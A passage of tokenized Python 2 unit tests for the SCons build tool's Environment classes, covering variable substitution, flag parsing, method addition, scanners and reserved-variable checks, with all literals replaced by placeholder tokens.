<EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT>' ) <EOL> s = env . subst_list ( '<STR_LIT>' , target = [ t1 , t2 ] , source = [ s1 , s2 ] ) <EOL> assert s == [ [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] , s <EOL> s = env . subst_list ( '<STR_LIT>' , target = [ t1 , t2 ] , source = [ s1 , s2 ] ) <EOL> assert s == [ [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] , s <EOL> def foo ( target , source , env , for_signature ) : <EOL> assert str ( target ) == '<STR_LIT:t>' , target <EOL> assert str ( source ) == '<STR_LIT:s>' , source <EOL> return env [ "<STR_LIT>" ] <EOL> env = SubstitutionEnvironment ( BAR = foo , FOO = '<STR_LIT>' ) <EOL> t = DummyNode ( '<STR_LIT:t>' ) <EOL> s = DummyNode ( '<STR_LIT:s>' ) <EOL> lst = env . subst_list ( '<STR_LIT>' , target = t , source = s ) <EOL> assert lst == [ [ '<STR_LIT:test>' , '<STR_LIT>' ] ] , lst <EOL> if <NUM_LIT:0> : <EOL> def bar ( arg ) : <EOL> pass <EOL> env = SubstitutionEnvironment ( BAR = bar , FOO = '<STR_LIT>' ) <EOL> subst = env . subst_list ( '<STR_LIT>' , call = None ) <EOL> assert subst is bar , subst <EOL> subst = env . subst_list ( '<STR_LIT>' , call = None ) <EOL> assert subst is bar , subst <EOL> def test_subst_path ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyProxy : <EOL> def __init__ ( self , val ) : <EOL> self . val = val <EOL> def get ( self ) : <EOL> return self . val + '<STR_LIT>' <EOL> class MyNode : <EOL> def __init__ ( self , val ) : <EOL> self . val = val <EOL> def get_subst_proxy ( self ) : <EOL> return self <EOL> def __str__ ( self ) : <EOL> return self . val <EOL> class MyObj : <EOL> def get ( self ) : <EOL> return self <EOL> env = SubstitutionEnvironment ( FOO = '<STR_LIT:foo>' , <EOL> BAR = '<STR_LIT:bar>' , <EOL> LIST = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> PROXY = MyProxy ( '<STR_LIT>' ) ) <EOL> r = env . subst_path ( '<STR_LIT>' ) <EOL> assert r == [ '<STR_LIT:foo>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert r == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert map ( str , r ) == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert r == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , target = MyNode ( '<STR_LIT>' ) ) <EOL> assert map ( str , r ) == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , source = MyNode ( '<STR_LIT>' ) ) <EOL> assert map ( str , r ) == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> n = MyObj ( ) <EOL> r = env . subst_path ( [ '<STR_LIT>' , MyProxy ( '<STR_LIT>' ) , n ] ) <EOL> assert r == [ '<STR_LIT>' , '<STR_LIT>' , n ] , r <EOL> class StringableObj : <EOL> def __init__ ( self , s ) : <EOL> self . s = s <EOL> def __str__ ( self ) : <EOL> return self . s <EOL> env = SubstitutionEnvironment ( FOO = StringableObj ( "<STR_LIT:foo>" ) , <EOL> BAR = StringableObj ( "<STR_LIT:bar>" ) ) <EOL> r = env . subst_path ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> assert r == [ "<STR_LIT>" , "<STR_LIT>" ] , r <EOL> r = env . subst_path ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> assert r == [ "<STR_LIT>" , "<STR_LIT>" ] , r <EOL> r = env . subst_path ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> assert r == [ "<STR_LIT>" , "<STR_LIT>" ] , r <EOL> def test_subst_target_source ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT:a>' , BBB = '<STR_LIT:b>' ) <EOL> mystr = env . subst_target_source ( "<STR_LIT>" ) <EOL> assert mystr == "<STR_LIT>" , mystr <EOL> def test_backtick ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> save_stderr = sys . stderr <EOL> python = '<STR_LIT:">' + sys . executable + '<STR_LIT:">' <EOL> try : <EOL> sys . stderr = StringIO . StringIO ( ) <EOL> cmd = '<STR_LIT>' % ( python , test . workpath ( '<STR_LIT>' ) ) <EOL> output = env . backtick ( cmd ) <EOL> errout = sys . stderr . getvalue ( ) <EOL> assert output == '<STR_LIT>' , output <EOL> assert errout == '<STR_LIT>' , errout <EOL> sys . stderr = StringIO . StringIO ( ) <EOL> cmd = '<STR_LIT>' % ( python , test . workpath ( '<STR_LIT>' ) ) <EOL> output = env . backtick ( cmd ) <EOL> errout = sys . stderr . getvalue ( ) <EOL> assert output == '<STR_LIT>' , output <EOL> assert errout == '<STR_LIT>' , errout <EOL> sys . stderr = StringIO . StringIO ( ) <EOL> cmd = '<STR_LIT>' % ( python , test . workpath ( '<STR_LIT>' ) ) <EOL> try : <EOL> env . backtick ( cmd ) <EOL> except OSError , e : <EOL> assert str ( e ) == "<STR_LIT>" % cmd , str ( e ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> sys . stderr = StringIO . StringIO ( ) <EOL> cmd = '<STR_LIT>' % ( python , test . workpath ( '<STR_LIT>' ) ) <EOL> env [ '<STR_LIT>' ] = os . environ . copy ( ) <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> output = env . backtick ( cmd ) <EOL> errout = sys . stderr . getvalue ( ) <EOL> assert output == '<STR_LIT>' , output <EOL> assert errout == '<STR_LIT>' , errout <EOL> finally : <EOL> sys . stderr = save_stderr <EOL> def test_AddMethod ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( FOO = '<STR_LIT:foo>' ) <EOL> def func ( self ) : <EOL> return '<STR_LIT>' + self [ '<STR_LIT>' ] <EOL> assert not hasattr ( env , '<STR_LIT>' ) <EOL> env . AddMethod ( func ) <EOL> r = env . func ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> assert not hasattr ( env , '<STR_LIT:bar>' ) <EOL> env . AddMethod ( func , '<STR_LIT:bar>' ) <EOL> r = env . bar ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> def func2 ( self , arg = '<STR_LIT>' ) : <EOL> return '<STR_LIT>' + self [ '<STR_LIT>' ] + arg <EOL> env . AddMethod ( func2 ) <EOL> r = env . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env . func2 ( '<STR_LIT>' ) <EOL> assert r == '<STR_LIT>' , r <EOL> env . AddMethod ( func2 , '<STR_LIT>' ) <EOL> r = env . func ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env . func ( '<STR_LIT>' ) <EOL> assert r == '<STR_LIT>' , r <EOL> env1 = Environment ( FOO = '<STR_LIT:1>' ) <EOL> env1 . AddMethod ( func2 ) <EOL> env2 = env1 . Clone ( FOO = '<STR_LIT:2>' ) <EOL> env3 = env2 . Clone ( FOO = '<STR_LIT:3>' ) <EOL> env4 = env3 . Clone ( FOO = '<STR_LIT:4>' ) <EOL> r = env1 . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env2 . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env3 . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env4 . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> env1 = Environment ( FOO = '<STR_LIT:1>' ) <EOL> env1 . AddMethod ( func2 ) <EOL> def replace_func2 ( ) : <EOL> return '<STR_LIT>' <EOL> env1 . func2 = replace_func2 <EOL> env2 = env1 . Clone ( FOO = '<STR_LIT:2>' ) <EOL> r = env2 . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> def test_Override ( self ) : <EOL> "<STR_LIT>" <EOL> env = SubstitutionEnvironment ( ONE = <NUM_LIT:1> , TWO = <NUM_LIT:2> , THREE = <NUM_LIT:3> , FOUR = <NUM_LIT:4> ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:2> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:3> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:4> , env [ '<STR_LIT>' ] <EOL> env2 = env . Override ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT:x>' , '<STR_LIT>' , '<STR_LIT:y>' ] } ) <EOL> assert env2 [ '<STR_LIT>' ] == <NUM_LIT:1> , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT:x>' , <NUM_LIT:4> , '<STR_LIT:y>' ] , env2 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:2> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:3> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:4> , env [ '<STR_LIT>' ] <EOL> env2 . Replace ( ONE = "<STR_LIT>" ) <EOL> assert env2 [ '<STR_LIT>' ] == "<STR_LIT>" , env2 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> , env [ '<STR_LIT>' ] <EOL> def test_ParseFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> empty = { <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> d = env . ParseFlags ( None ) <EOL> assert d == empty , d <EOL> d = env . ParseFlags ( '<STR_LIT>' ) <EOL> assert d == empty , d <EOL> d = env . ParseFlags ( [ ] ) <EOL> assert d == empty , d <EOL> s = "<STR_LIT>" + '<STR_LIT>' + "<STR_LIT>" + '<STR_LIT>' + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" <EOL> d = env . ParseFlags ( s ) <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT:value>' ] , '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , <EOL> '<STR_LIT:bar>' , <EOL> '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , <EOL> '<STR_LIT:foo>' , <EOL> '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> LIBS = map ( str , d [ '<STR_LIT>' ] ) <EOL> assert LIBS == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , ( d [ '<STR_LIT>' ] , LIBS ) <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> def test_MergeFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> env . MergeFlags ( '<STR_LIT>' ) <EOL> assert not env . has_key ( '<STR_LIT>' ) , env [ '<STR_LIT>' ] <EOL> env . MergeFlags ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env . MergeFlags ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env = SubstitutionEnvironment ( CCFLAGS = None ) <EOL> env . MergeFlags ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env = SubstitutionEnvironment ( ) <EOL> env . MergeFlags ( { '<STR_LIT:A>' : [ '<STR_LIT>' ] , '<STR_LIT:B>' : [ '<STR_LIT>' ] } ) <EOL> assert env [ '<STR_LIT:A>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT:A>' ] <EOL> assert env [ '<STR_LIT:B>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT:B>' ] <EOL> class BaseTestCase ( unittest . TestCase , TestEnvironmentFixture ) : <EOL> reserved_variables = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def test___init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> env2 = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env1 == env2 , diff_env ( env1 , env2 ) <EOL> assert not env1 . has_key ( '<STR_LIT>' ) <EOL> assert not env2 . has_key ( '<STR_LIT>' ) <EOL> def test_variables ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeOptions : <EOL> def __init__ ( self , key , val ) : <EOL> self . calls = <NUM_LIT:0> <EOL> self . key = key <EOL> self . val = val <EOL> def keys ( self ) : <EOL> return [ self . key ] <EOL> def Update ( self , env ) : <EOL> env [ self . key ] = self . val <EOL> self . calls = self . calls + <NUM_LIT:1> <EOL> o = FakeOptions ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> env = Environment ( variables = o , AAA = '<STR_LIT>' ) <EOL> assert o . calls == <NUM_LIT:1> , o . calls <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> def test_get ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( aaa = '<STR_LIT>' ) <EOL> x = env . get ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env . get ( '<STR_LIT>' ) <EOL> assert x is None , x <EOL> x = env . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_Builder_calls ( self ) : <EOL> """<STR_LIT>""" <EOL> global called_it <EOL> b1 = Builder ( ) <EOL> b2 = Builder ( ) <EOL> env = Environment ( ) <EOL> env . Replace ( BUILDERS = { '<STR_LIT>' : b1 , <EOL> '<STR_LIT>' : b2 } ) <EOL> called_it = { } <EOL> env . builder1 ( '<STR_LIT>' ) <EOL> assert called_it [ '<STR_LIT:target>' ] == None , called_it <EOL> assert called_it [ '<STR_LIT:source>' ] == [ '<STR_LIT>' ] , called_it <EOL> called_it = { } <EOL> env . builder2 ( source = '<STR_LIT>' , xyzzy = <NUM_LIT:1> ) <EOL> assert called_it [ '<STR_LIT:target>' ] == None , called_it <EOL> assert called_it [ '<STR_LIT:source>' ] == [ '<STR_LIT>' ] , called_it <EOL> assert called_it [ '<STR_LIT>' ] == <NUM_LIT:1> , called_it <EOL> called_it = { } <EOL> env . builder1 ( foo = '<STR_LIT:bar>' ) <EOL> assert called_it [ '<STR_LIT:foo>' ] == '<STR_LIT:bar>' , called_it <EOL> assert called_it [ '<STR_LIT:target>' ] == None , called_it <EOL> assert called_it [ '<STR_LIT:source>' ] == None , called_it <EOL> def test_BuilderWrapper_attributes ( self ) : <EOL> """<STR_LIT>""" <EOL> b1 = Builder ( ) <EOL> b2 = Builder ( ) <EOL> e1 = Environment ( ) <EOL> e2 = Environment ( ) <EOL> e1 . Replace ( BUILDERS = { '<STR_LIT:b>' : b1 } ) <EOL> bw = e1 . b <EOL> assert bw . env is e1 <EOL> bw . env = e2 <EOL> assert bw . env is e2 <EOL> assert bw . builder is b1 <EOL> bw . builder = b2 <EOL> assert bw . builder is b2 <EOL> self . assertRaises ( AttributeError , getattr , bw , '<STR_LIT>' ) <EOL> bw . foobar = <NUM_LIT> <EOL> assert bw . foobar is <NUM_LIT> <EOL> def _DO_NOT_test_Builder_execs ( self ) : <EOL> """<STR_LIT>""" <EOL> global built_it <EOL> b1 = Builder ( ) <EOL> b2 = Builder ( ) <EOL> built_it = { } <EOL> env3 = Environment ( ) <EOL> env3 . Replace ( BUILDERS = { '<STR_LIT>' : b1 , <EOL> '<STR_LIT>' : b2 } ) <EOL> env3 . builder1 . execute ( target = '<STR_LIT>' ) <EOL> env3 . builder2 . execute ( target = '<STR_LIT>' ) <EOL> env3 . builder1 . execute ( target = '<STR_LIT>' ) <EOL> assert built_it [ '<STR_LIT>' ] <EOL> assert built_it [ '<STR_LIT>' ] <EOL> assert built_it [ '<STR_LIT>' ] <EOL> env4 = env3 . Clone ( ) <EOL> assert env4 . builder1 . env is env4 , "<STR_LIT>" % ( <EOL> env4 . builder1 . env , env3 ) <EOL> assert env4 . builder2 . env is env4 , "<STR_LIT>" % ( <EOL> env4 . builder1 . env , env3 ) <EOL> built_it = { } <EOL> env5 = self . TestEnvironment ( BUILDERS = { '<STR_LIT:foo>' : b1 } ) <EOL> env5 [ '<STR_LIT>' ] [ '<STR_LIT:bar>' ] = b2 <EOL> env5 . foo . execute ( target = '<STR_LIT>' ) <EOL> env5 . bar . execute ( target = '<STR_LIT>' ) <EOL> assert built_it [ '<STR_LIT>' ] <EOL> assert built_it [ '<STR_LIT>' ] <EOL> built_it = { } <EOL> env6 = Environment ( ) <EOL> env6 [ '<STR_LIT>' ] = { '<STR_LIT:foo>' : b1 , <EOL> '<STR_LIT:bar>' : b2 } <EOL> env6 . foo . execute ( target = '<STR_LIT>' ) <EOL> env6 . bar . execute ( target = '<STR_LIT>' ) <EOL> assert built_it [ '<STR_LIT>' ] <EOL> assert built_it [ '<STR_LIT>' ] <EOL> def test_Scanners ( self ) : <EOL> """<STR_LIT>""" <EOL> global scanned_it <EOL> s1 = Scanner ( name = '<STR_LIT>' , skeys = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> s2 = Scanner ( name = '<STR_LIT>' , skeys = [ "<STR_LIT>" ] ) <EOL> s3 = Scanner ( name = '<STR_LIT>' , skeys = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> suffixes = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> env = Environment ( ) <EOL> try : del env [ '<STR_LIT>' ] <EOL> except KeyError : pass <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ None , None , None , None , None ] , s <EOL> env = self . TestEnvironment ( SCANNERS = [ ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ None , None , None , None , None ] , s <EOL> env . Replace ( SCANNERS = [ s1 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , None , None ] , s <EOL> env . Append ( SCANNERS = [ s2 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , s2 , None ] , s <EOL> env . AppendUnique ( SCANNERS = [ s3 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , s2 , s3 ] , s <EOL> env = env . Clone ( SCANNERS = [ s2 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ None , None , None , s2 , None ] , s <EOL> env [ '<STR_LIT>' ] = [ s1 ] <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , None , None ] , s <EOL> env . PrependUnique ( SCANNERS = [ s2 , s1 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , s2 , None ] , s <EOL> env . Prepend ( SCANNERS = [ s3 ] ) <EOL> s = map ( env . get_scanner , suffixes ) <EOL> assert s == [ s1 , s1 , None , s3 , s3 ] , s <EOL> def test_ENV ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert env . Dictionary ( '<STR_LIT>' ) [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def test_ReservedVariables ( self ) : <EOL> """<STR_LIT>""" <EOL> reserved_variables = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> warning = SCons . Warnings . ReservedVariableWarning <EOL> SCons . Warnings . enableWarningClass ( warning ) <EOL> old = SCons . Warnings . warningAsException ( <NUM_LIT:1> ) <EOL> try : <EOL> env4 = Environment ( ) <EOL> for kw in self . reserved_variables : <EOL> exc_caught = None <EOL> try : <EOL> env4 [ kw ] = '<STR_LIT>' <EOL> except warning : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" % kw <EOL> assert not env4 . has_key ( kw ) , "<STR_LIT>" % kw <EOL> finally : <EOL> SCons . Warnings . warningAsException ( old ) <EOL> def test_FutureReservedVariables ( self ) : <EOL> """<STR_LIT>""" <EOL> future_reserved_variables = [ ] <EOL> warning = SCons . Warnings . FutureReservedVariableWarning <EOL> SCons . Warnings . enableWarningClass ( warning ) <EOL> old = SCons . Warnings . warningAsException ( <NUM_LIT:1> ) <EOL> try : <EOL> env4 = Environment ( ) <EOL> for kw in future_reserved_variables : <EOL> exc_caught = None <EOL> try : <EOL> env4 [ kw ] = '<STR_LIT>' <EOL> except warning : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" % kw <EOL> assert env4 . has_key ( kw ) , "<STR_LIT>" % kw <EOL> finally : <EOL> SCons . Warnings . warningAsException ( old ) <EOL> def test_IllegalVariables ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> def test_it ( var , env = env ) : <EOL> exc_caught = None <EOL> try : <EOL> env [ var ] = <NUM_LIT:1> <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" % var <EOL> env [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> , env [ '<STR_LIT>' ] <EOL> test_it ( '<STR_LIT>' ) <EOL> test_it ( '<STR_LIT>' ) <EOL> test_it ( '<STR_LIT>' ) <EOL> def test_autogenerate ( dict ) : <EOL> """<STR_LIT>""" <EOL> drive , p = os . path . splitdrive ( os . getcwd ( ) ) <EOL> def normalize_path ( path , drive = drive ) : <EOL> if path [ <NUM_LIT:0> ] in '<STR_LIT>' : <EOL> path = drive + path <EOL> path = os . path . normpath ( path ) <EOL> drive , path = os . path . splitdrive ( path ) <EOL> return string . lower ( drive ) + path <EOL> env = dict . TestEnvironment ( LIBS = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] , <EOL> LIBLINKPREFIX = '<STR_LIT:foo>' , <EOL> LIBLINKSUFFIX = '<STR_LIT:bar>' ) <EOL> def RDirs ( pathlist , fs = env . fs ) : <EOL> return fs . Dir ( '<STR_LIT>' ) . Rfindalldirs ( pathlist ) <EOL> env [ '<STR_LIT>' ] = RDirs <EOL> flags = env . subst_list ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> assert flags == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , flags <EOL> blat = env . fs . Dir ( '<STR_LIT>' ) <EOL> env . Replace ( CPPPATH = [ '<STR_LIT:foo>' , '<STR_LIT>' , blat ] , <EOL> INCPREFIX = '<STR_LIT>' , <EOL> INCSUFFIX = '<STR_LIT:bar>' , <EOL> FOO = '<STR_LIT>' ) <EOL> flags = env . subst_list ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> expect = [ '<STR_LIT>' , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> ] <EOL> assert flags == expect , flags <EOL> env . Replace ( F77PATH = [ '<STR_LIT:foo>' , '<STR_LIT>' , blat ] , <EOL> INCPREFIX = '<STR_LIT>' , <EOL> INCSUFFIX = '<STR_LIT:bar>' , <EOL> FOO = '<STR_LIT>' ) <EOL> flags = env . subst_list ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> expect = [ '<STR_LIT>' , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> normalize_path ( '<STR_LIT:foo>' ) , <EOL> normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> ] <EOL> assert flags == expect , flags <EOL> env . Replace ( CPPPATH = '<STR_LIT>' , F77PATH = '<STR_LIT>' , LIBPATH = '<STR_LIT>' ) <EOL> l = env . subst_list ( '<STR_LIT>' ) <EOL> assert l == [ [ ] ] , l <EOL> l = env . subst_list ( '<STR_LIT>' ) <EOL> assert l == [ [ ] ] , l <EOL> l = env . subst_list ( '<STR_LIT>' ) <EOL> assert l == [ [ ] ] , l <EOL> env . fs . Repository ( '<STR_LIT>' ) <EOL> env . fs . Repository ( '<STR_LIT>' ) <EOL> env . Replace ( CPPPATH = [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' , blat ] , <EOL> INCPREFIX = '<STR_LIT>' , <EOL> INCSUFFIX = '<STR_LIT>' , <EOL> FOO = '<STR_LIT>' ) <EOL> flags = env . subst_list ( '<STR_LIT>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> expect = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> 